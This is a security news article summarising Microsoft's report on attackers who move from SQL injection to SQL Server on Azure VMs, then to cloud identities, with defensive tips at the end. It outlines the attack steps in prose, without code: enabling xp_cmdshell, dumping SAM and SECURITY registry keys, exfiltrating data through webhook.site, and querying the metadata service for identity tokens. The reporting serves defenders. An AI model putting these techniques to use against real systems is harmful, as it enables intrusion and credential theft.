Hackers have been observed trying to breach cloud environments through Microsoft SQL Servers vulnerable to SQL injection.
Microsoft’s security researchers report that this lateral movement technique has been previously seen in attacks on other services like VMs and Kubernetes clusters.
However, this is the first time they have seen SQL Servers leveraged for this purpose.
Attack chain
The attacks Microsoft observed start with exploiting an SQL injection vulnerability in an application in the target’s environment.
This enables the threat actors to gain access to the SQL Server instance hosted on Azure Virtual Machine with elevated permissions to execute SQL commands and extract valuable data.
This includes data on databases, table names, schemas, database versions, network configuration, and read/write/delete permissions.
If the compromised application has elevated permissions, the attackers may activate the ‘xp_cmdshell’ command to run operating system (OS) commands via SQL, giving them a shell in the host.
The commands executed by the attackers at this stage include the following:
- Read directories, list processes, and check network shares.
- Download encoded and compressed executables and PowerShell scripts.
- Set up a scheduled task to launch a backdoor script.
- Retrieve user credentials by dumping SAM and SECURITY registry keys.
- Exfiltrate data using a unique method that involves the ‘webhook.site’ free service, which facilitates HTTP request and email inspection and debugging.
Using a legitimate service for data exfiltration makes the activity less likely to appear suspicious or raise any flags by security products, allowing the attackers to discreetly steal data from the host.
Next, the attackers attempted to exploit the cloud identity of the SQL Server instance to access the IMDS (Instant Metadata Service) and obtain the cloud identity access key.
In Azure, resources are often assigned managed identities for authentication with other cloud resources and services. If the attackers hold that token, they can use it to access any cloud resource the identity has permissions to.
Microsoft says the attackers failed to successfully leverage this technique due to errors, but the approach remains valid and constitutes a dire threat to organizations.
Finally, the threat actors deleted any downloaded scripts and wiped temporary database modifications to erase traces of the attack.
Defending tips
Microsoft suggests using Defender for Cloud and Defender for Endpoint to catch SQL injections and suspicious SQLCMD activity, both employed in the observed attack.
To mitigate the threat, Microsoft recommends applying the principle of least privilege when granting user permissions, which always adds friction in lateral movement attempts.
Hunting queries for 365 Defender and Sentinel are provided in the appendix of Microsoft’s report.